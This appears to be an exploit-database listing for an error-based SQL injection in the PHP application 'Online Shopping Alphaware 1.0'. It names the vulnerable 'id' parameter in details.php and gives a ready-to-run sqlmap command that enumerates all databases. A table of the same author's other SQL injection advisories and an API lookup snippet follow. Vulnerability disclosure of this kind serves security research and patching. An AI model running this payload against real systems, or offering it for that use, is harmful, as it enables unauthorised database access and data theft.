Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
"Moaaz Taha"
Platform
php
Release date
2020-12-01
1 2 3 4 5 6 7 8 9 10 11 | # Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-20 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10 |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-01 | "Online Shopping Alphaware 1.0 - Error Based SQL injection" | webapps | php | "Moaaz Taha" |
2020-10-20 | "Mobile Shop System v1.0 - SQL Injection Authentication Bypass" | webapps | php | "Moaaz Taha" |
2020-08-31 | "Online Book Store 1.0 - 'id' SQL Injection" | webapps | php | "Moaaz Taha" |
2020-08-28 | "Online Shopping Alphaware 1.0 - 'id' SQL Injection" | webapps | php | "Moaaz Taha" |
2020-08-18 | "Pharmacy Medical Store and Sale Point 1.0 - 'catid' SQL Injection" | webapps | php | "Moaaz Taha" |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49131/?format=json')
For full documentation follow the link above